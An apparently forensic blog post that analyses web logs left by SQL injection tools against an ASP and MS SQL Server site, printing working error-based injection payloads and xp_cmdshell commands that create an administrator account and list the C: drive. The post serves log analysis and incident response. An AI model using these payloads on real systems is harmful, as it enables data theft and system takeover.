An investigation into SQL Injection tools — The pattern of each attack tool Part II
When you look at the logs as follow, you will realize that SQL statement and error messages are similar with HDSI attack tool. That’s bacuase the principle of SQL Injection attack is almost the same.
Similarly, when using DSQL tool, the error format contains specific information from the DB table and lists the information using it.
- 14:01:01 192.168.228.1–192.168.228.100 80 GET / xxx/vul_page.asp?vul_parmeter =0000000001'%20And%20(Select%20char(124)%2BCast(Count(*)%20as%20varchar(8000))%2Bchar(124)%20From%20[test]..[syscolumns]%20where%20(id%20=%20(SELECT%20TOP%201%20id%20FROM%20[sysobjects]%20WHERE%20name%20=%20char(116)%2Bchar(98)%2Bchar(108)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(99)%2Bchar(111)%2Bchar(117)%2Bchar(110)%2Bchar(116))))>0%20and%20'’=’|7|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Syntax_error_converting_the_varchar_value_’|6|’_to_a_column_of_data_type_int. 500
- 14:01:01 192.168.228.1–192.168.228.100 80 GET / xxx/vul_page.asp?vul_parmeter =0000000001'%20And%20(Select%20Top%201%20char(124)%2Bname%2Bchar(124)%20From%20(Select%20Top%201%20[name]%20From%20[syscolumns]%20where%20(id%20=%20(SELECT%20TOP%201%20id%20FROM%20[sysobjects]%20WHERE%20name%20=%20char(116)%2Bchar(98)%2Bchar(108)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(99)%2Bchar(111)%2Bchar(117)%2Bchar(110)%2Bchar(116)))%20Order%20by%20[name])%20T%20Order%20by%20[name]%20desc)>0%20and%20'’=’|7|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Syntax_error_converting_the_nvarchar_value_’|refer_url|’_to_a_column_of_data_type_int. 500
SQL statements passed as parameters are executed, and database error information is exposed. You can see that the attacker obtained the information “6” and “refer_url” through a syntax error. This allows analysts to identify the damage and determine the extent of the information breach.
|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Syntax_error_converting_the_varchar_value_’|6|’_to_a_column_of_data_type_int. 500
[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Syntax_error_converting_the_nvarchar_value_’|refer_url|’_to_a_column_of_data_type_int. 500
When the SQL statements left in the first log are executed, the count of columns in a specific table is returned through database errors. To identify a column number of certain table, used CAST SQL statement.
The tool used certain ASCII code characters as separators to collect necessary information from response information. ASCII code character 124 (char(124)) is a vertical bar character. Compare with HDSI, it used ASCII code 94 (char(94)) which corresponds to the caret symbol ‘^’.
To collect necessary information, vertical bar characters are placed before and after the “name” variable value to separate it from other unnecessary information.
<SQL Statement in web logs>
- Select char(124)+Cast(Count(*) as varchar(8000))+char(124) From [test]..[syscolumns] where (id = (SELECT TOP 1 id FROM [sysobjects] WHERE name = char(116)+char(98)+char(108)+char(95)+char(117)+char(115)+char(101)+char(114)+char(99)+char(111)+char(117)+char(110)+char(116)))
<Microsoft SQL — CAST and CONVERT Description>
<Description source: ChatGTP>
SELECT
CHAR(124) + CAST(COUNT(*) AS VARCHAR(8000)) + CHAR(124)
FROM
[test]..[syscolumns]
WHERE
(id = (
SELECT TOP 1 id
FROM [sysobjects]
WHERE name =
CHAR(116) + CHAR(98) + CHAR(108) + CHAR(95) + CHAR(117) +
CHAR(115) + CHAR(101) + CHAR(114) + CHAR(99) + CHAR(111) +
CHAR(117) + CHAR(110) + CHAR(116)
))
Breaking down the query step by step:
The outer query selects a concatenation of three values: CHAR(124) (which represents the vertical bar ‘|’), the count of columns (converted to a VARCHAR with a length of 8000), and CHAR(124) again.
The FROM clause specifies the table [test]..[syscolumns], which is likely a system table that stores column information.
The WHERE clause filters the rows from [syscolumns] based on the ‘id’ column. The ‘id’ value is retrieved from a subquery.
The subquery selects the ‘id’ value from the [sysobjects] table where the ‘name’ column matches a specific string formed by concatenating multiple CHAR function calls. In this case, the string is ‘tbl_usercount’.
Overall, this query is attempting to retrieve the count of columns from the [test]..[syscolumns] table where the ‘id’ matches the ‘id’ value of the ‘tbl_usercount’ table from the [sysobjects] table.
Please note that the query may not execute properly if the table or column names are incorrect or if the user running the query doesn’t have the necessary permissions.
An investigation into SQL Inection tools — System command executed.
Due to SQL Injection vulnerability, it can cause serious damage such as exposure of DB information.
The damage does not stop with database information exposure. It is possible to take over the system through an attack.
If you or your administrator set the “sa” account as a user when interworking with ODBC, attackers can use extended stored procedures (ex. xp_cmdshell) to execute system commands. This is a very powerful feature and is disabled by default.
For more information, please refer to the technical description in the link.
Web logs generated when adding users
The following is a log that adds a user named ‘user_test’ to the system by executing xp_cmdshell using the SQL Injection vulnerability. Loot at the web log for system inspection and identify a system damage when system commands are executed due to SQL injection vulerability.
[Adding a user account]
192.168.228.1–192.168.228.100 80 GET /xxx/vul_page.asp?vul_parmeter=0000000001 ‘;exec%20master..xp_cmdshell%20’net%20user%20user_test%20test4321%20/add’; — |123|800a0d5d|Application_uses_a_value_of_the_wrong_type_for_the_current_operation. 500
[Adding a user account to the administrator group]
192.168.228.1–192.168.228.100 80 GET xxx/vul_page.asp?vul_parmeter=0000000001 ‘;exec%20master..xp_cmdshell%20’net%20localgroup%20administrators%20user_test%20/add’; — |123|800a0d5d|Application_uses_a_value_of_the_wrong_type_for_the_current_operation. 500
After added an account, an attacker adds that account to the Administrators group to take over the system.
① Add user account
http://www.test.co.kr/xxx/vul_page.asp?vul_parmeter=1234';exec master..xp_cmdshell ‘net user user_test test4321 /add’; —
② Add a member to the administrator group
http://www.test.co.kr/ xxx/vul_page.asp?vul_parmeter=0000000001';exec master..xp_cmdshell ‘net localgroup administrators user_test /add’; —
Web logs generated when system commands are executed
Let’s look at the web logs generated when another type of system command is executed.
Like the previous web log, the response code leaves an error message (error code 500)
21:18:44 192.168.228.1–192.168.228.100 80 HEAD / xxx/vul_page.asp?vul_parmeter =0000000001%27%3B%44%72%6F%70%20%74%61%62%6C%65%20%63%6F%6D%64%5F%6C%69%73%74%20%3B%43%52%45%41%54%45%20%54%41%42%4C%45%20%63%6F%6D%64%5F%6C%69%73%74%20%28%43%6F%6D%52%65%73%75%6C%74%20%6E%76%61%72%63%68%61%72%28%31%30%30%30%29%29%20%49%4E%53%45%52%54%20%63%6F%6D%64%5F%6C%69%73%74%20%45%58%45%43%20%4D%41%53%54%45%52%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%22%64%69%72%20%63%3A%5C%22%2D%2D|32|800a004c|경로를_찾을_수_없습니다. 500
21:18:44 192.168.228.1–192.168.228.100 80 GET / xxx/vul_page.asp?vul_parmeter =0000000001'%20And%20(select%20top%201%20char(94)%2Bcast(ComResult%20as%20varchar(8000))%2Bchar(94)%20%20from%20(%20select%20top%201%20ComResult%20from%20[comd_list]%20order%20by%20ComResult%20desc%20)%20as%20as_TableName%20order%20by%20ComResult%20asc%20)>0%20And%20'’=’|7|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Invalid_object_name_’comd_list’. 500
You will need to decode the web logs to investigate.
There are SQL statements in the web logs. Decoded SQL statements are as follow:
- Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell “dir c:\” —
- select top 1 char(94)+cast(ComResult as varchar(8000))+char(94) from ( select top 1 ComResult from [comd_list] order by ComResult desc ) as as_TableName order by ComResult asc
The first SQL statement deletes the “comd_list” table. To delete existing tables and create new ones, first execute the delete command if there are any tables left. The second SQL statement creates the “comd_list” table and adds system command execution result to that table.
Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell “dir c:\” —
The second web log is a query to check system command execution result. When executed using the query tool, the C path listing result is obtained.
select top 1 char(94)+cast(ComResult as varchar(8000))+char(94) from ( select top 1 ComResult from [comd_list] order by ComResult desc ) as as_TableName order by ComResult asc
You will realize that SQL statement and error messages are similar patterns. As I mentioned earlier that’s bacuase the principle of SQL Injection attack is almost the same.
Attackers will use anti-detection method to avoid traces but if you’re understanding the principle of SQL Injection attack, you will be able to find a needle in a haystack.
